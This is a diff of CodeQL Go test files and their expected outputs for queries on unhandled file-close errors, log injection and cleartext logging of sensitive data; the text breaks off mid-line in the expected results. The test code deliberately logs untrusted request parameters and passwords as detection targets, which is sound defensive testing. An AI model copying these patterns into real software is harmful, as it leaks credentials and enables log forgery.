OpenFile | call to OpenFile | -| tests.go:68:3:68:3 | f | tests.go:66:5:66:76 | ... := ...[0] | tests.go:68:3:68:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:66:15:66:76 | call to OpenFile | call to OpenFile | -| tests.go:110:9:110:9 | f | tests.go:108:5:108:78 | ... := ...[0] | tests.go:110:9:110:9 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:108:15:108:78 | call to OpenFile | call to OpenFile | -| tests.go:129:3:129:3 | f | tests.go:125:5:125:78 | ... := ...[0] | tests.go:129:3:129:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:125:15:125:78 | call to OpenFile | call to OpenFile | +| tests.go:10:8:10:8 | f | tests.go:32:5:32:78 | ... := ...[0] | tests.go:10:8:10:8 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:32:15:32:78 | call to OpenFile | call to OpenFile | +| tests.go:10:8:10:8 | f | tests.go:46:5:46:76 | ... := ...[0] | tests.go:10:8:10:8 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:46:15:46:76 | call to OpenFile | call to OpenFile | +| tests.go:15:3:15:3 | f | tests.go:32:5:32:78 | ... := ...[0] | tests.go:15:3:15:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:32:15:32:78 | call to OpenFile | call to OpenFile | +| tests.go:15:3:15:3 | f | tests.go:46:5:46:76 | ... := ...[0] | tests.go:15:3:15:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:46:15:46:76 | call to OpenFile | call to OpenFile | +| tests.go:57:3:57:3 | f | tests.go:55:5:55:78 | ... := ...[0] | tests.go:57:3:57:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:55:15:55:78 | call to OpenFile | call to OpenFile | +| tests.go:69:3:69:3 | f | tests.go:67:5:67:76 | ... := ...[0] | tests.go:69:3:69:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:67:15:67:76 | call to OpenFile | call to OpenFile | +| tests.go:111:9:111:9 | f | tests.go:109:5:109:78 | ... := ...[0] | tests.go:111:9:111:9 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:109:15:109:78 | call to OpenFile | call to OpenFile | +| tests.go:130:3:130:3 | f | tests.go:126:5:126:78 | ... := ...[0] | tests.go:130:3:130:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:126:15:126:78 | call to OpenFile | call to OpenFile | +| tests.go:151:8:151:8 | f | tests.go:147:2:147:74 | ... := ...[0] | tests.go:151:8:151:8 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:147:12:147:74 | call to OpenFile | call to OpenFile | edges -| tests.go:8:24:8:24 | definition of f | tests.go:9:8:9:8 | f | provenance | | -| tests.go:12:32:12:32 | definition of f | tests.go:13:13:15:2 | capture variable f | provenance | | -| tests.go:13:13:15:2 | capture variable f | tests.go:14:3:14:3 | f | provenance | | -| tests.go:31:5:31:78 | ... := ...[0] | tests.go:32:21:32:21 | f | provenance | Src:MaD:1 | -| tests.go:31:5:31:78 | ... := ...[0] | tests.go:33:29:33:29 | f | provenance | Src:MaD:1 | -| tests.go:32:21:32:21 | f | tests.go:8:24:8:24 | definition of f | provenance | | -| tests.go:33:29:33:29 | f | tests.go:12:32:12:32 | definition of f | provenance | | -| tests.go:45:5:45:76 | ... := ...[0] | tests.go:46:21:46:21 | f | provenance | Src:MaD:1 | -| tests.go:45:5:45:76 | ... := ...[0] | tests.go:47:29:47:29 | f | provenance | Src:MaD:1 | -| tests.go:46:21:46:21 | f | tests.go:8:24:8:24 | definition of f | provenance | | -| tests.go:47:29:47:29 | f | tests.go:12:32:12:32 | definition of f | provenance | | -| tests.go:54:5:54:78 | ... := ...[0] | tests.go:56:3:56:3 | f | provenance | Src:MaD:1 | -| tests.go:66:5:66:76 | ... := ...[0] | tests.go:68:3:68:3 | f | provenance | Src:MaD:1 | -| tests.go:108:5:108:78 | ... := ...[0] | tests.go:110:9:110:9 | f | provenance | Src:MaD:1 | -| tests.go:125:5:125:78 | ... := ...[0] | tests.go:129:3:129:3 | f | provenance | Src:MaD:1 | +| tests.go:9:24:9:24 | definition of f | tests.go:10:8:10:8 | f | provenance | | +| tests.go:13:32:13:32 | definition of f | tests.go:14:13:16:2 | capture variable f | provenance | | +| tests.go:14:13:16:2 | capture variable f | tests.go:15:3:15:3 | f | provenance | | +| tests.go:32:5:32:78 | ... := ...[0] | tests.go:33:21:33:21 | f | provenance | Src:MaD:1 | +| tests.go:32:5:32:78 | ... := ...[0] | tests.go:34:29:34:29 | f | provenance | Src:MaD:1 | +| tests.go:33:21:33:21 | f | tests.go:9:24:9:24 | definition of f | provenance | | +| tests.go:34:29:34:29 | f | tests.go:13:32:13:32 | definition of f | provenance | | +| tests.go:46:5:46:76 | ... := ...[0] | tests.go:47:21:47:21 | f | provenance | Src:MaD:1 | +| tests.go:46:5:46:76 | ... := ...[0] | tests.go:48:29:48:29 | f | provenance | Src:MaD:1 | +| tests.go:47:21:47:21 | f | tests.go:9:24:9:24 | definition of f | provenance | | +| tests.go:48:29:48:29 | f | tests.go:13:32:13:32 | definition of f | provenance | | +| tests.go:55:5:55:78 | ... := ...[0] | tests.go:57:3:57:3 | f | provenance | Src:MaD:1 | +| tests.go:67:5:67:76 | ... := ...[0] | tests.go:69:3:69:3 | f | provenance | Src:MaD:1 | +| tests.go:109:5:109:78 | ... := ...[0] | tests.go:111:9:111:9 | f | provenance | Src:MaD:1 | +| tests.go:126:5:126:78 | ... := ...[0] | tests.go:130:3:130:3 | f | provenance | Src:MaD:1 | +| tests.go:147:2:147:74 | ... := ...[0] | tests.go:151:8:151:8 | f | provenance | Src:MaD:1 | models | 1 | Source: os; ; false; OpenFile; ; ; ReturnValue[0]; file; manual | nodes -| tests.go:8:24:8:24 | definition of f | semmle.label | definition of f | -| tests.go:9:8:9:8 | f | semmle.label | f | -| tests.go:12:32:12:32 | definition of f | semmle.label | definition of f | -| tests.go:13:13:15:2 | capture variable f | semmle.label | capture variable f | -| tests.go:14:3:14:3 | f | semmle.label | f | -| tests.go:31:5:31:78 | ... := ...[0] | semmle.label | ... := ...[0] | -| tests.go:32:21:32:21 | f | semmle.label | f | -| tests.go:33:29:33:29 | f | semmle.label | f | -| tests.go:45:5:45:76 | ... := ...[0] | semmle.label | ... := ...[0] | -| tests.go:46:21:46:21 | f | semmle.label | f | -| tests.go:47:29:47:29 | f | semmle.label | f | -| tests.go:54:5:54:78 | ... := ...[0] | semmle.label | ... := ...[0] | -| tests.go:56:3:56:3 | f | semmle.label | f | -| tests.go:66:5:66:76 | ... := ...[0] | semmle.label | ... := ...[0] | -| tests.go:68:3:68:3 | f | semmle.label | f | -| tests.go:108:5:108:78 | ... := ...[0] | semmle.label | ... := ...[0] | -| tests.go:110:9:110:9 | f | semmle.label | f | -| tests.go:125:5:125:78 | ... := ...[0] | semmle.label | ... := ...[0] | -| tests.go:129:3:129:3 | f | semmle.label | f | +| tests.go:9:24:9:24 | definition of f | semmle.label | definition of f | +| tests.go:10:8:10:8 | f | semmle.label | f | +| tests.go:13:32:13:32 | definition of f | semmle.label | definition of f | +| tests.go:14:13:16:2 | capture variable f | semmle.label | capture variable f | +| tests.go:15:3:15:3 | f | semmle.label | f | +| tests.go:32:5:32:78 | ... := ...[0] | semmle.label | ... := ...[0] | +| tests.go:33:21:33:21 | f | semmle.label | f | +| tests.go:34:29:34:29 | f | semmle.label | f | +| tests.go:46:5:46:76 | ... := ...[0] | semmle.label | ... := ...[0] | +| tests.go:47:21:47:21 | f | semmle.label | f | +| tests.go:48:29:48:29 | f | semmle.label | f | +| tests.go:55:5:55:78 | ... := ...[0] | semmle.label | ... := ...[0] | +| tests.go:57:3:57:3 | f | semmle.label | f | +| tests.go:67:5:67:76 | ... := ...[0] | semmle.label | ... := ...[0] | +| tests.go:69:3:69:3 | f | semmle.label | f | +| tests.go:109:5:109:78 | ... := ...[0] | semmle.label | ... := ...[0] | +| tests.go:111:9:111:9 | f | semmle.label | f | +| tests.go:126:5:126:78 | ... := ...[0] | semmle.label | ... := ...[0] | +| tests.go:130:3:130:3 | f | semmle.label | f | +| tests.go:147:2:147:74 | ... := ...[0] | semmle.label | ... := ...[0] | +| tests.go:151:8:151:8 | f | semmle.label | f | subpaths diff --git a/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/UnhandledCloseWritableHandle.qlref b/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/UnhandledCloseWritableHandle.qlref index 82300c2182c8..af272c9022f2 100644 --- a/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/UnhandledCloseWritableHandle.qlref +++ b/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/UnhandledCloseWritableHandle.qlref @@ -1,2 +1,4 @@ query: InconsistentCode/UnhandledCloseWritableHandle.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: +- utils/test/PrettyPrintModels.ql +- utils/test/InlineExpectationsTestQuery.ql diff --git a/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/tests.go b/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/tests.go index 36c78863b624..ec74b12e5a3d 100644 --- a/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/tests.go +++ b/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/tests.go @@ -1,17 +1,18 @@ package test import ( + "io" "log" "os" ) func closeFileDeferred(f *os.File) { - defer f.Close() // NOT OK, if `f` is writable + defer f.Close() // $ Alert=w Alert=rw } func closeFileDeferredIndirect(f *os.File) { var cont = func() { - f.Close() // NOT OK, if `f` is writable + f.Close() // $ Alert=w Alert=rw } defer cont() @@ -28,7 +29,7 @@ func closeFileDeferredIndirectReturn(f *os.File) { func deferredCalls() { // open file for writing - if f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666); err != nil { + if f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666); err != nil { // $ Source=w closeFileDeferred(f) // NOT OK closeFileDeferredIndirect(f) // NOT OK closeFileDeferredIndirectReturn(f) // OK - the error is not discarded at the call to Close (though it is discarded later) @@ -42,7 +43,7 @@ func deferredCalls() { } // open file for reading and writing - if f, err := os.OpenFile("foo.txt", os.O_RDWR|os.O_TRUNC|os.O_CREATE, 0666); err != nil { + if f, err := os.OpenFile("foo.txt", os.O_RDWR|os.O_TRUNC|os.O_CREATE, 0666); err != nil { // $ Source=rw closeFileDeferred(f) // NOT OK closeFileDeferredIndirect(f) // NOT OK closeFileDeferredIndirectReturn(f) // OK - the error is not discarded at the call to Close (though it is discarded later) @@ -51,9 +52,9 @@ func deferredCalls() { func notDeferred() { // open file for writing - if f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666); err != nil { + if f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666); err != nil { // $ Source // the handle is write-only and we don't check if `Close` succeeds - f.Close() // NOT OK + f.Close() // $ Alert } // open file for reading @@ -63,9 +64,9 @@ func notDeferred() { } // open file for reading and writing - if f, err := os.OpenFile("foo.txt", os.O_RDWR|os.O_TRUNC|os.O_CREATE, 0666); err != nil { + if f, err := os.OpenFile("foo.txt", os.O_RDWR|os.O_TRUNC|os.O_CREATE, 0666); err != nil { // $ Source // the handle is read-write and we don't check if `Close` succeeds - f.Close() // NOT OK + f.Close() // $ Alert } } @@ -105,9 +106,9 @@ func deferredCloseWithSync() { func deferredCloseWithSyncEarlyReturn(n int) { // open file for writing - if f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666); err != nil { + if f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666); err != nil { // $ Source // a call to `Close` is deferred - defer f.Close() // NOT OK + defer f.Close() // $ Alert if n > 100 { return @@ -122,10 +123,36 @@ func deferredCloseWithSyncEarlyReturn(n int) { func unhandledSync() { // open file for writing - if f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666); err != nil { + if f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666); err != nil { // $ Source // we have a call to `Sync` which precedes the call to `Close`, but there is no check // to see if `Sync` may have failed f.Sync() - f.Close() // NOT OK + f.Close() // $ Alert + } +} + +func returnedSync() error { + // open file for writing + f, err := os.OpenFile("foo.txt", os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 0666) + if err != nil { + // we have a call to `Sync` which precedes the call to `Close`, but there is no check + // to see if `Sync` may have failed + return err + } + defer f.Close() + return f.Sync() +} + +func copyFile(destFile string, mode os.FileMode, src io.Reader) error { + f, err := os.OpenFile(destFile, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, mode) // $ Source + if err != nil { + return err + } + defer f.Close() // $ SPURIOUS: Alert + + _, err = io.Copy(f, src) + if err != nil { + return err } + return f.Sync() } diff --git a/go/ql/test/query-tests/Security/CWE-117/LogInjection.go b/go/ql/test/query-tests/Security/CWE-117/LogInjection.go index 6fb628c4cc38..fc9d71791582 100644 --- a/go/ql/test/query-tests/Security/CWE-117/LogInjection.go +++ b/go/ql/test/query-tests/Security/CWE-117/LogInjection.go @@ -30,52 +30,54 @@ import ( func handler(req *http.Request, ctx *goproxy.ProxyCtx) { username := req.URL.Query()["username"][0] - slice := []any{"username", username} + password := req.URL.Query()["password"][0] + formatString := req.URL.Query()["formatString"][0] testFlag := req.URL.Query()["testFlag"][0] + slice := []any{"username", username} { - fmt.Print(username) // $ hasTaintFlow="username" - fmt.Printf(username) // $ hasTaintFlow="username" - fmt.Println(username) // $ hasTaintFlow="username" - fmt.Fprint(nil, username) // Fprint functions are only loggers if they target stdout/stderr - fmt.Fprintf(nil, username) - fmt.Fprintln(nil, username) + fmt.Print(username, password) // $ hasTaintFlow="username" hasTaintFlow="password" + fmt.Printf(formatString, username, password) // $ hasTaintFlow="formatString" hasTaintFlow="username" hasTaintFlow="password" + fmt.Println(username, password) // $ hasTaintFlow="username" hasTaintFlow="password" + fmt.Fprint(nil, username, password) // Fprint functions are only loggers if they target stdout/stderr + fmt.Fprintf(nil, formatString, username, password) + fmt.Fprintln(nil, username, password) } // log { - log.Print("user %s logged in.\n", username) // $ hasTaintFlow="username" - log.Printf("user %s logged in.\n", username) // $ hasTaintFlow="username" - log.Println("user %s logged in.\n", username) // $ hasTaintFlow="username" + log.Print("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" + log.Printf(formatString, username, password) // $ hasTaintFlow="formatString" hasTaintFlow="username" hasTaintFlow="password" + log.Println("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" if testFlag == "true" { - log.Fatal("user %s logged in.\n", username) // $ hasTaintFlow="username" + log.Fatal("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" } if testFlag == "true" { - log.Fatalf("user %s logged in.\n", username) // $ hasTaintFlow="username" + log.Fatalf(formatString, username, password) // $ hasTaintFlow="formatString" hasTaintFlow="username" hasTaintFlow="password" } if testFlag == "true" { - log.Fatalln("user %s logged in.\n", username) // $ hasTaintFlow="username" + log.Fatalln("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" } if testFlag == "true" { - log.Panic("user %s logged in.\n", username) // $ hasTaintFlow="username" + log.Panic("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" } if testFlag == "true" { - log.Panicf("user %s logged in.\n", username) // $ hasTaintFlow="username" + log.Panicf(formatString, username, password) // $ hasTaintFlow="formatString" hasTaintFlow="username" hasTaintFlow="password" } if testFlag == "true" { - log.Panicln("user %s logged in.\n", username) // $ hasTaintFlow="username" + log.Panicln("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" } logger := log.Default() - logger.Print("user %s logged in.\n", username) // $ hasTaintFlow="username" - logger.Printf("user %s logged in.\n", username) // $ hasTaintFlow="username" - logger.Println("user %s logged in.\n", username) // $ hasTaintFlow="username" - logger.Fatal("user %s logged in.\n", username) // $ hasTaintFlow="username" - logger.Fatalf("user %s logged in.\n", username) // $ hasTaintFlow="username" - logger.Fatalln("user %s logged in.\n", username) // $ hasTaintFlow="username" - logger.Panic("user %s logged in.\n", username) // $ hasTaintFlow="username" - logger.Panicf("user %s logged in.\n", username) // $ hasTaintFlow="username" - logger.Panicln("user %s logged in.\n", username) // $ hasTaintFlow="username" + logger.Print("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" + logger.Printf(formatString, username, password) // $ hasTaintFlow="formatString" hasTaintFlow="username" hasTaintFlow="password" + logger.Println("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" + logger.Fatal("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" + logger.Fatalf(formatString, username, password) // $ hasTaintFlow="formatString" hasTaintFlow="username" hasTaintFlow="password" + logger.Fatalln("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" + logger.Panic("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" + logger.Panicf(formatString, username, password) // $ hasTaintFlow="formatString" hasTaintFlow="username" hasTaintFlow="password" + logger.Panicln("user is logged in:", username, password) // $ hasTaintFlow="username" hasTaintFlow="password" } // k8s.io/klog { @@ -421,7 +423,6 @@ func handler(req *http.Request, ctx *goproxy.ProxyCtx) { simpleLogger.Tracew("%s", username) // $ hasTaintFlow="username" simpleLogger.Debugw("%s %s", slice...) // $ hasTaintFlow="slice" } - } type Logger interface { @@ -514,8 +515,12 @@ func handlerGood4(req *http.Request, ctx *goproxy.ProxyCtx) { verbose.Infof("user %q logged in.\n", username) klog.Infof("user %q logged in.\n", username) klog.Errorf("user %q logged in.\n", username) - klog.Fatalf("user %q logged in.\n", username) - klog.Exitf("user %q logged in.\n", username) + if testFlag == " true" { + klog.Fatalf("user %q logged in.\n", username) + } + if testFlag == " true" { + klog.Exitf("user %q logged in.\n", username) + } } // elazarl/goproxy { @@ -529,16 +534,24 @@ func handlerGood4(req *http.Request, ctx *goproxy.ProxyCtx) { glog.Infof("user %q logged in.\n", username) glog.Errorf("user %q logged in.\n", username) - glog.Fatalf("user %q logged in.\n", username) - glog.Exitf("user %q logged in.\n", username) + if testFlag == " true" { + glog.Fatalf("user %q logged in.\n", username) + } + if testFlag == " true" { + glog.Exitf("user %q logged in.\n", username) + } } // sirupsen/logrus { logrus.Debugf("user %q logged in.\n", username) logrus.Errorf("user %q logged in.\n", username) - logrus.Fatalf("user %q logged in.\n", username) + if testFlag == " true" { + logrus.Fatalf("user %q logged in.\n", username) + } logrus.Infof("user %q logged in.\n", username) - logrus.Panicf("user %q logged in.\n", username) + if testFlag == " true" { + logrus.Panicf("user %q logged in.\n", username) + } logrus.Printf("user %q logged in.\n", username) logrus.Tracef("user %q logged in.\n", username) logrus.Warnf("user %q logged in.\n", username) @@ -548,10 +561,14 @@ func handlerGood4(req *http.Request, ctx *goproxy.ProxyCtx) { entry := logrus.WithFields(fields) entry.Debugf("user %q logged in.\n", username) entry.Errorf("user %q logged in.\n", username) - entry.Fatalf("user %q logged in.\n", username) + if testFlag == " true" { + entry.Fatalf("user %q logged in.\n", username) + } entry.Infof("user %q logged in.\n", username) entry.Logf(0, "user %q logged in.\n", username) - entry.Panicf("user %q logged in.\n", username) + if testFlag == " true" { + entry.Panicf("user %q logged in.\n", username) + } entry.Printf("user %q logged in.\n", username) entry.Tracef("user %q logged in.\n", username) entry.Warnf("user %q logged in.\n", username) @@ -560,10 +577,14 @@ func handlerGood4(req *http.Request, ctx *goproxy.ProxyCtx) { logger := entry.Logger logger.Debugf("user %q logged in.\n", username) logger.Errorf("user %q logged in.\n", username) - logger.Fatalf("user %q logged in.\n", username) + if testFlag == " true" { + logger.Fatalf("user %q logged in.\n", username) + } logger.Infof("user %q logged in.\n", username) logger.Logf(0, "user %q logged in.\n", username) - logger.Panicf("user %q logged in.\n", username) + if testFlag == " true" { + logger.Panicf("user %q logged in.\n", username) + } logger.Printf("user %q logged in.\n", username) logger.Tracef("user %q logged in.\n", username) logger.Warnf("user %q logged in.\n", username) @@ -599,8 +620,12 @@ func handlerGood4(req *http.Request, ctx *goproxy.ProxyCtx) { verbose.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" klog.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" klog.Errorf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - klog.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - klog.Exitf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + if testFlag == " true" { + klog.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } + if testFlag == " true" { + klog.Exitf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } } // elazarl/goproxy { @@ -614,16 +639,24 @@ func handlerGood4(req *http.Request, ctx *goproxy.ProxyCtx) { glog.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" glog.Errorf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - glog.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - glog.Exitf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + if testFlag == " true" { + glog.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } + if testFlag == " true" { + glog.Exitf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } } // sirupsen/logrus { - logrus.Debugf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - logrus.Errorf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - logrus.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - logrus.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" - logrus.Panicf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + logrus.Debugf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + logrus.Errorf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + if testFlag == " true" { + logrus.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } + logrus.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" + if testFlag == " true" { + logrus.Panicf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } logrus.Printf("user %#q logged in.\n", username) // $ hasTaintFlow="username" logrus.Tracef("user %#q logged in.\n", username) // $ hasTaintFlow="username" logrus.Warnf("user %#q logged in.\n", username) // $ hasTaintFlow="username" @@ -631,24 +664,32 @@ func handlerGood4(req *http.Request, ctx *goproxy.ProxyCtx) { fields := make(logrus.Fields) entry := logrus.WithFields(fields) - entry.Debugf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - entry.Errorf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - entry.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - entry.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" - entry.Logf(0, "user %#q logged in.\n", username) // $ hasTaintFlow="username" - entry.Panicf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + entry.Debugf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + entry.Errorf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + if testFlag == " true" { + entry.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } + entry.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" + entry.Logf(0, "user %#q logged in.\n", username) // $ hasTaintFlow="username" + if testFlag == " true" { + entry.Panicf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } entry.Printf("user %#q logged in.\n", username) // $ hasTaintFlow="username" entry.Tracef("user %#q logged in.\n", username) // $ hasTaintFlow="username" entry.Warnf("user %#q logged in.\n", username) // $ hasTaintFlow="username" entry.Warningf("user %#q logged in.\n", username) // $ hasTaintFlow="username" logger := entry.Logger - logger.Debugf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - logger.Errorf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - logger.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" - logger.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" - logger.Logf(0, "user %#q logged in.\n", username) // $ hasTaintFlow="username" - logger.Panicf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + logger.Debugf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + logger.Errorf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + if testFlag == " true" { + logger.Fatalf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } + logger.Infof("user %#q logged in.\n", username) // $ hasTaintFlow="username" + logger.Logf(0, "user %#q logged in.\n", username) // $ hasTaintFlow="username" + if testFlag == " true" { + logger.Panicf("user %#q logged in.\n", username) // $ hasTaintFlow="username" + } logger.Printf("user %#q logged in.\n", username) // $ hasTaintFlow="username" logger.Tracef("user %#q logged in.\n", username) // $ hasTaintFlow="username" logger.Warnf("user %#q logged in.\n", username) // $ hasTaintFlow="username" @@ -677,3 +718,9 @@ func handlerGood4(req *http.Request, ctx *goproxy.ProxyCtx) { sLogger.Warnf("user %#q logged in.\n", username) // $ hasTaintFlow="username" } } + +// GOOD: User-provided values formatted using a %T directive, which prints the type of the argument +func handlerGood5(req *http.Request) { + object := req.URL.Query()["username"][0] + log.Printf("found object of type %T.\n", object) +} diff --git a/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected b/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected index 3435eff77754..a7f7f83a9ffe 100644 --- a/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected +++ b/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected @@ -1,35 +1,35 @@ #select -| klog.go:22:15:22:20 | header | klog.go:20:30:20:37 | selection of Header | klog.go:22:15:22:20 | header | $@ flows to a logging call. | klog.go:20:30:20:37 | selection of Header | Sensitive data returned by HTTP request headers | -| klog.go:28:13:28:41 | call to Get | klog.go:28:13:28:20 | selection of Header | klog.go:28:13:28:41 | call to Get | $@ flows to a logging call. | klog.go:28:13:28:20 | selection of Header | Sensitive data returned by HTTP request headers | -| main.go:15:12:15:19 | password | main.go:15:12:15:19 | password | main.go:15:12:15:19 | password | $@ flows to a logging call. | main.go:15:12:15:19 | password | Sensitive data returned by an access to password | -| main.go:16:17:16:24 | password | main.go:16:17:16:24 | password | main.go:16:17:16:24 | password | $@ flows to a logging call. | main.go:16:17:16:24 | password | Sensitive data returned by an access to password | -| main.go:17:13:17:20 | password | main.go:17:13:17:20 | password | main.go:17:13:17:20 | password | $@ flows to a logging call. | main.go:17:13:17:20 | password | Sensitive data returned by an access to password | -| main.go:18:14:18:21 | password | main.go:18:14:18:21 | password | main.go:18:14:18:21 | password | $@ flows to a logging call. | main.go:18:14:18:21 | password | Sensitive data returned by an access to password | -| main.go:19:12:19:19 | password | main.go:19:12:19:19 | password | main.go:19:12:19:19 | password | $@ flows to a logging call. | main.go:19:12:19:19 | password | Sensitive data returned by an access to password | -| main.go:20:17:20:24 | password | main.go:20:17:20:24 | password | main.go:20:17:20:24 | password | $@ flows to a logging call. | main.go:20:17:20:24 | password | Sensitive data returned by an access to password | -| main.go:21:13:21:20 | password | main.go:21:13:21:20 | password | main.go:21:13:21:20 | password | $@ flows to a logging call. | main.go:21:13:21:20 | password | Sensitive data returned by an access to password | -| main.go:22:14:22:21 | password | main.go:22:14:22:21 | password | main.go:22:14:22:21 | password | $@ flows to a logging call. | main.go:22:14:22:21 | password | Sensitive data returned by an access to password | -| main.go:23:12:23:19 | password | main.go:23:12:23:19 | password | main.go:23:12:23:19 | password | $@ flows to a logging call. | main.go:23:12:23:19 | password | Sensitive data returned by an access to password | -| main.go:24:17:24:24 | password | main.go:24:17:24:24 | password | main.go:24:17:24:24 | password | $@ flows to a logging call. | main.go:24:17:24:24 | password | Sensitive data returned by an access to password | -| main.go:25:13:25:20 | password | main.go:25:13:25:20 | password | main.go:25:13:25:20 | password | $@ flows to a logging call. | main.go:25:13:25:20 | password | Sensitive data returned by an access to password | -| main.go:26:14:26:21 | password | main.go:26:14:26:21 | password | main.go:26:14:26:21 | password | $@ flows to a logging call. | main.go:26:14:26:21 | password | Sensitive data returned by an access to password | -| main.go:27:16:27:23 | password | main.go:27:16:27:23 | password | main.go:27:16:27:23 | password | $@ flows to a logging call. | main.go:27:16:27:23 | password | Sensitive data returned by an access to password | -| main.go:30:10:30:17 | password | main.go:30:10:30:17 | password | main.go:30:10:30:17 | password | $@ flows to a logging call. | main.go:30:10:30:17 | password | Sensitive data returned by an access to password | -| main.go:31:15:31:22 | password | main.go:31:15:31:22 | password | main.go:31:15:31:22 | password | $@ flows to a logging call. | main.go:31:15:31:22 | password | Sensitive data returned by an access to password | -| main.go:32:11:32:18 | password | main.go:32:11:32:18 | password | main.go:32:11:32:18 | password | $@ flows to a logging call. | main.go:32:11:32:18 | password | Sensitive data returned by an access to password | -| main.go:33:12:33:19 | password | main.go:33:12:33:19 | password | main.go:33:12:33:19 | password | $@ flows to a logging call. | main.go:33:12:33:19 | password | Sensitive data returned by an access to password | -| main.go:34:10:34:17 | password | main.go:34:10:34:17 | password | 